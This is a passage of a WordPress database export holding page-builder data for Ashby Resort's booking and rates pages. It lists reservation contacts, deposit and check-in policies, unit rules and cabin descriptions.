color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Ashby Resort Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request a Booking\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Book your stay by calling (218) 747-2959. The calendar below is updated to date showing availability.<\\/p>\\n<p>You can also send a request for booking&nbsp; online by clicking Request a Booking above.<br>We will call you to confirm Reservation.<br>Remember that a deposit is required before a booking can be confirmed. <br>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2703,859,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2706,860,'_elementor_edit_mode','builder'),(2707,860,'_elementor_template_type','post'),(2708,860,'_elementor_version','2.5.16'),(2709,860,'_wp_page_template','default'),(2710,860,'_elementor_data','[{\"id\":\"4adec0b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"70747d3\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d049168\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c31cdc6\"}]},\"elements\":[{\"id\":\"bfba0b0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":64.607,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8dc92bc\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"61a4004\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b84ac64\"}]},\"elements\":[{\"id\":\"c0628bb\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\"><strong>X = Booked Dates in Ashby Resort Calendar<br \\/><\\/strong><\\/h4>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"99be00f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":35.393,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7460108\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"ef75090\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d9d3424\"}]},\"elements\":[{\"id\":\"82fe7ed\",\"elType\":\"widget\",\"settings\":{\"text\":\"Request a Booking\",\"link\":{\"url\":\"http:\\/\\/ashbyresort.com\\/calendar\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"left\",\"button_text_color\":\"#ffffff\",\"background_color\":\"#a5463b\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"90a8733\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"630c297\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d1b6305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"35bf2b4\"}]},\"elements\":[{\"id\":\"736fef9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8f92b24\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d513b8a\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"74df4fb\"}]},\"elements\":[{\"id\":\"b62ea51\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Book your stay by calling (218) 747-2959. The calendar below is updated to show availability.<\\/p><p>You can also send a request for booking\\u00a0 online by clicking Request a Booking above.<br \\/>We will call you to confirm Reservation.<br \\/>Remember that a deposit is required before a booking can be confirmed. <br \\/>Of course if you would prefer you can just call us to set up a reservation at (218) 747- 2959.<\\/p>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cc7f02f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"0407491\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fa94346\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"695a7cc\"}]},\"elements\":[{\"id\":\"cc62ce7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":80,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"2a1cfd1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"d37f553\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"ff5cdae\"}]},\"elements\":[{\"id\":\"0adf302\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[table id=3 \\/]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false},{\"id\":\"d5cd555\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":20,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"9418820\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"0adff2e\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"8b812cc\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2711,860,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2714,864,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:193:\"Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1561209629391\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86410000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86410001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:996:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 1 pet per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1561209786812\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86410002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86410003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2715,867,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:193:\"Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1561209629391\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:996:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less All Daytime (Not Overnight) Guests $5.00 each Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.<br />\nCHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 1 pet per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1561209786812\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:18:\"sow-editor-4310003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2716,868,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:193:\"Call us at 218-747-2959 for reservations \n\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION. \nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW\n\nWireless Internet Available\n\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"11204652295ac05b55c096b837426865\";s:19:\"_sow_form_timestamp\";s:13:\"1561209629391\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86810000\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"34e797fc-6974-4b3b-8eb6-544b37e4a209\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:1;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=1 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"18793130955c116b6806d46092030907\";s:19:\"_sow_form_timestamp\";s:0:\"\";s:2:\"id\";s:18:\"sow-editor-4310001\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86810001\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"8ac3ac01-adf6-4851-b9c7-d7222096a988\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}i:2;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:1077:\"<p>ALL Cabins and Motel rooms are NON smoking !!</p>\n<p>Suite #9 – Cabins #13 &amp; #14 are no smoking and no pets<br />\nPrices shown are for groups of 4 or less  All Daytime (Not Overnight) Guests $5.00 each  Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.<br />\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875%  ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.  PLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.<br />\nA 40% DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION.  ALL DEPOSITS ARE NON-REFUNDABLE.</p>\n<p>A 3% PROCESSING FEE WILL BE ADDED FOR ALL CREDIT AND DEBIT CARD USAGE.</p>\n<p>CHECK IN TIME IS AFTER 3:00PM  <strong>NO</strong> EXCEPTIONS !!  CHECK OUT TIME IS BEFORE 10:00AM, <strong>NO</strong> exceptions !!<br />\nPets on a leash are welcome in all campsites ( 1 pet per campsite)  and some of the units ( 1 pet per unit where allowable).<br />\nPlease do not bring firewood, if you live more than 50 miles from Ashby!<br />\nMOTEL OPEN YEAR ROUND.  Call to set up reservations for Hunting and Ice fishing.</p>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:31:\"3546584265c116ab1dc10e015252218\";s:19:\"_sow_form_timestamp\";s:13:\"1561484891463\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"85ab9bbb-8186-4c45-b1a9-8918ac44e4c7\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86810002\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}i:3;a:10:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:14:\"[table id=2 /]\";s:20:\"text_selected_editor\";s:4:\"html\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:32:\"20718259185ac05cee9f16d963512666\";s:19:\"_sow_form_timestamp\";s:13:\"1522556152258\";s:2:\"id\";s:18:\"sow-editor-4310003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-86810003\";s:11:\"panels_info\";a:7:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"deca295a-37eb-45d6-bbe2-3e8cf611f0f3\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}}}s:5:\"grids\";a:1:{i:0;a:4:{s:5:\"cells\";i:1;s:5:\"style\";a:1:{s:14:\"cell_alignment\";s:10:\"flex-start\";}s:5:\"ratio\";i:1;s:15:\"ratio_direction\";s:5:\"right\";}}s:10:\"grid_cells\";a:1:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(2717,870,'_elementor_edit_mode','builder'),(2718,870,'_elementor_template_type','post'),(2719,870,'_elementor_version','2.5.15'),(2720,870,'_wp_page_template','default'),(2721,870,'_elementor_data','[{\"id\":\"f523c97\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"5afd9c7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"79c352d\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c4cd61c\"}]},\"elements\":[{\"id\":\"c7622c7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"013e706\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2a9bf7b\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4aff54c\"}]},\"elements\":[{\"id\":\"31f7a67\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h2>\\u00a0<\\/h2><p><strong>Love to stay at a Cabin - <span style=\\\"text-decoration: underline;\\\"><a href=\\\"http:\\/\\/ashbyresort.com\\/calendar\\/\\\">Call us at 218-747-2959 to book it<\\/a><\\/span><\\/strong><\\/p><p>Cabins are available weekly only\\u00a0 (Saturday to Saturday) during June and July. There are a few weeks still available for 2019.<\\/p><p><strong>Our motel and cabins are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets. <a href=\\\"http:\\/\\/ashbyresort.com\\/campground-map\\/\\\">(see map)<\\/a><\\/strong><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a763503\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3f28486\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"76a9305\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"3ec644e\"}]},\"elements\":[{\"id\":\"c20b05e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"d36d555\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"b3d4418\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"bc32c7b\"}]},\"elements\":[{\"id\":\"44df606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 10\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"25a558f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"http:\\/\\/ashbyresort.com\\/wp-content\\/uploads\\/2017\\/01\\/Carly-001.jpg\",\"id\":286}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5430be8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<div id=\\\"panel-786-1-0-1\\\" class=\\\"so-panel widget widget_sow-editor\\\" data-index=\\\"2\\\"><div class=\\\"so-widget-sow-editor so-widget-sow-editor-base\\\"><div class=\\\"siteorigin-widget-tinymce textwidget\\\"><p><strong>2 bedroom , 1 bath<\\/strong><\\/p><p><strong>2\\u00a0queen beds, 1 double bed, 1 futon<\\/strong><\\/p><p><strong>Sleeps 8<\\/strong><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"666a77c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"3c6e3e6\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"3cf59d7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"69505cd\"}]},\"elements\":[{\"id\":\"ec73946\",\"elType\":\"widget\",\"settings\":{\"title\":\"Cabin 